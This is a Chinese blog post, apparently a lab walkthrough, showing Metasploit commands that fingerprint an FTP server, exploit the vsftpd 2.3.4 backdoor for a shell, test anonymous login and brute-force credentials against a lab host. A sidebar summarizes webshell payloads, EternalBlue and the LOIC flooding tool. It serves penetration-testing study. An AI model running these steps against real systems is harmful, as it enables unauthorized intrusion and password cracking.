msf利用ftp协议进行信息搜集

最新推荐文章于 2024-03-11 09:05:08 发布
最新推荐文章于 2024-03-11 09:05:08 发布
阅读量734 收藏 3
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/104411676
版权

1.使用ftp_version查看信息
搜索模块
msf5 > search ftp_version
在这里插入图片描述
使用模块,查看信息
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > show options
在这里插入图片描述
msf5 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.132.180
msf5 auxiliary(scanner/ftp/ftp_version) > set THREADS 14
msf5 auxiliary(scanner/ftp/ftp_version) > run
在这里插入图片描述
扫描处结果是vsFTPd 2.3.4,搜索这个版本
msf5 > search 2.3.4
在这里插入图片描述
加载模块,查看信息
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
在这里插入图片描述
配置信息,run
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.132.180
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
在这里插入图片描述
进入后可以执行操作

在这里插入图片描述




2:ftp匿名登录扫描
msf5 > use auxiliary/scanner/ftp/anonymous
msf5 auxiliary(scanner/ftp/anonymous) show options
在这里插入图片描述
配置信息
msf5 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.132.180
msf5 auxiliary(scanner/ftp/anonymous) > run
在这里插入图片描述


3:ftp暴力破解
搜索模块
msf5 > search ftp_login
在这里插入图片描述
加载模块,查看配置
msf5 > use auxiliary/scanner/ftp/ftp_login
msf5 auxiliary(scanner/ftp/ftp_login) > show options
在这里插入图片描述
配置信息
sf5 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.132.180
msf5 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf5 auxiliary(scanner/ftp/ftp_login) > run
在这里插入图片描述
这里的脚本因为我实现写入了msfadmin msfadmin所以最后扫描成功了
在这里插入图片描述

Deeeelete
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。   下面是具体的利用方法。   我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:   产生webshell   msfpayload windows/meterpret
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心  MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目的参与者,如项目经理、开发工程师、系统架构师、顾问、质量管理人员等,想找到项目管理中遇到问题的解决方案,相信本文会给您一定的帮助。MSF为成功地规划、设计、开发和部署IT解决方案提供了一套成熟的方法论。与具有固定框架的方法相反,MSF提供了一个可以伸缩的灵活框架,以满足任何规模的组织或者项目开发团队的需要。MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法
最新发布
qq_59020256的博客
03-11 1173
但是这里出现了报错,经过一系列排查后发现是数据库的原因,是由于数据库没有打开,按照上面开启数据库的办法将数据库打开就ok了。(1) MySQL建用户的时候会指定一个host,默认是127.0.0.1/localhost只能本机访问;%为任意用户都有权限连接,localhost为只能本机连接,配置完host为%这一步就已经能外网访问了。use 0(这里0表示前面的编号)no表示可以设置也可以不用设置的参数。这里查询到了我们刚刚对数据库的操作。将查询到的结果存入到数据库中。yes表示必要设置的参数。
口令暴力破解--Ftp协议暴力破解与Ssh协议暴力破解
薛定谔的猫
04-12 4683
服务器收到请求之后,先在该服务器上你的主目录下寻找你的公用密匙,然后把它和你发送过来的公用密匙进行比较。同时如果服务器没有其他安全限制,如登录来源IP,账户登录错误次数,则会可能存在被暴力破解的可能。打开kali-linux命令行窗口,输入ssh [email protected],任意输入用户名密码,提示访问被阻止。尝试登录FTP服务器,打开kali系统终端,输入ftp 193.168.1.23,随后输入上面获取的用户名和密码。输入search ftp_login,搜索ftp_login模块。
实验四:MSF渗透测试之FTP漏洞模块
weixin_45822468的博客
01-12 827
这里有两个目录很重要。bash_history,因为它保存用户运行过的所有命令的历史记录。例如,可以找到有关用户 ID、密码、机密文件的信息名称、位置、服务器名称和共享文件夹。来显示当前目录和子目录以及我们对目录的权限的列表。如果特定版本没有任何公开漏洞,那么我们可以尝试使用字典攻击来查找有效的用户名和密码。这一步即使不知道ftp的username和password也可以得到一些信息。2.尝试通过控制台连接到FTP服务器 查看服务器版本信息和操作系统。1.可以使用hydra爆破ftp服务器的用户名和密码。
.MSF爆破 简介:实验利用kali MSFftp_login模块对metasploitable2中ftp服务实施攻击
qq_44122254的博客
03-21 2552
启动msf 使用search搜索ftp_login模块,使用use命令使用 set rhosts 设置IP set user_file /root/Desktop/user.txt设置用户名 set pass_file /root/Desktop/password.txt设置密码 在执行的时候我有出错了一下,我忘记提前建立user和password的爆破文档了 Run进行爆破 这是爆破成功的 如果只是在自己的kali复现漏洞做实验的话,做字典的时候没必要添加太多,浪费时间 ...
利用Kali的ftp_login模块破解ftp口令
MAY的博客
04-13 1533
破解Office加密文档、RAR加密文档口令
FTP弱口令渗透测试
明裕学长的博客
05-24 2854
任务环境说明: 服务器场景:Windows 服务器场景操作系统:Windows(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 靶机场景Windows--1 172.16.105.249 1.在BT5中使用Zenmap工具扫描服务器场景Windows所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、2
网络安全Kali之基于SSH、FTP协议收集信息
xueshenlaila的博客
03-24 5992
基于SSH协议收集信息 查看ssh服务的版本信息 msf6 > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(scanner/ssh/ssh_version) > show options msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180 msf6 auxiliary(scanner/ssh/ssh_version) > run 对SSH
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
kali 渗透msf
11-14
kali渗透测试利器
MSF学习篇之基本命令使用<1>
qq_30890029的博客
05-16 639
search cve:CVE-2017-8464 type:exploit 查找cve可执行exp漏洞。search命令是Metasploit框架中常用的命令,在日常使用中非常快速的查找模块或者漏洞。search name:mysql type:exploit 查找mysql漏洞类型是exp。存储了大量的漏洞利用程序/使用searchsploit可以搜索漏洞库里的利用程序。mysql/ssh/weblogic/ftp/telnet 等组件。show options 查看编号为1的exp利用所需要的参数。
MSF基本命令及实例
weixin_44371842的博客
07-07 3406
这里写目录标题MSF基本架构RexMSF::CoreMSF::BasePlugin插件MSF数据库恢复数据库技术功能模块(不是流程模块)MSF基本使用和控制台命令(MSFconsole)更新地位帮助命令MSF控制台基本命令模块内基本命令数据库操作Exploit模块Active exploits(主动exploit)Passive exploits(被动exploit)生成payloadMeterpreter简介常用命令Meterpreter python扩展实例暴力破解mysql数据库密码ms08-o67经
渗透测试之Metasploit
11-20
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
2022-渗透测试-信息收集-Metasploit(基于FTP协议)
保持微笑的博客
01-16 1823
目录 1.查看FTP服务的版本信息 2.通过FTP拿到root权限 3.ftp匿名登陆扫描 4.ftp暴力破解 1.查看FTP服务的版本信息 1.打开kali系统的Metasploit软件。 2.查找模块 search ftp_version 3.使用模块 4.查看需要配置的参数 show options 5.设置目标主机--靶机 set RHOSTS 192.168.0.112 6.run 如图,我们可以得知ftp的版本号是2.3.4 2.通过FTP...
msf-ftp
西部壮仔的博客
03-16 380
use auxiliary/scanner/ftp/ftp_version 收集ftp的版本信息 use auxiliary/scanner/ftp/anonymous 判断是否可以匿名登陆 use auxiliary/scanner/ftp/ftp_login ftp账号密码破解
metasploit 渗透测试(ftp
xul2009的专栏
04-13 1万+
晚上没事干,还不如
LOIC网站压力测试工具
热门推荐
Deeeelete的博客
02-02 2万+
官网下载:https://sourceforge.net/projects/loic/ 百度云:https://pan.baidu.com/s/1VVUjLqtq1mMAD-TJIAnhnQ 1.软件解压后运行,界面如图 2.然后可以在url处输入想要测试的网站网址,也可以输入ip地址,输入完之后要点击右侧的lock on,输入的网站地址会自动填充到selected target中。 3.下...
msf怎么利用永恒之蓝
06-10
永恒之蓝是指微软Windows操作系统SMBv1协议的漏洞,可以通过Metasploit框架中的EternalBlue exploit模块进行利用。以下是利用永恒之蓝漏洞的一些基本步骤: 1. 启动msfconsole:在终端中输入msfconsole并按Enter键...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值